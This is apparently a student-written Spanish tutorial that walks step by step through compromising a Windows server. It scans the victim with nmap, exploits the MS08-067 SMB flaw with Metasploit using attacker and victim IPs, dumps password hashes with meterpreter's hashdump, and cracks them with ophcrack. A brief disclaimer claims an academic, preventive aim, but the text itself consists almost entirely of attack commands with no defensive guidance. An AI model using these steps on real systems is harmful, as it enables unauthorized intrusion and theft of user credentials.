PASSWORD ATTACK  ACTIVE DIRECTORY

La siguiente información debe ser  para fines académicos, no nos hacemos responsables del mal manejo que se le dé a la información, el propósito de éste artículo es para prevenir este tipo de ataques.

Como sabemos Windows almacena los password en el archivo sam (c:\WINDOWS\system32\config\sam)

Para obtener los usuarios sus respectivas claves necesitaremos Backtrack 5r2 y la herramienta

OPHCRACK.

Pasos:

1.- Verificamos que las IP sean correctas tanto en el Backtrack como en el Windows server y que hagan pin

2. Escaneamos los puertos

>nmap –PN –sS –sV –O IP_VICTIMA

3.- Ubicamos el exploit a utilizar

>cd /pentest/exploits

>ls

>cd framework que se esta utilizando

4.- Abrimos el metaexploiyt

>./msfconsole

msf>use exploit/windows/smb/ms08_067_netapi

5.- Configuramos el LHOST y RHOST

msf> show options

msf> set LHOST IP_ATACANTE

msf> set RHOST IP_VICTIMA

6.- Realizamos el ataque

msf>exploit

Una vez ejecutamos con éxito nos debe salir que tenemos levantado una sesión

7.- Dentro de ella realizamos el ataque

meterpreter>hashdump

nos aparece una lista de usuarios y sus contraseñas pero estas están con hash, copiamos la línea completa del usuario que vamos a descifrar y lo guardamos en un archivo de texto

8.- Luego ejecutamos el ophcrack desde una terminal

>ophcrack

una vez abierto el programa hacemos lo siguiente:

Damos clic en load>pwdump file

Y seleccionamos el archivo que guardamos con el crack hash

Por ultimo damos click en crack y listo esperamos a que descifre la contraseña

INTEGRANTES:

Katherine Quintuña                       @katha021

Byron Rodríguez                            @chibolorodri

Juan Velez                                     @juankvellez

Victor Vera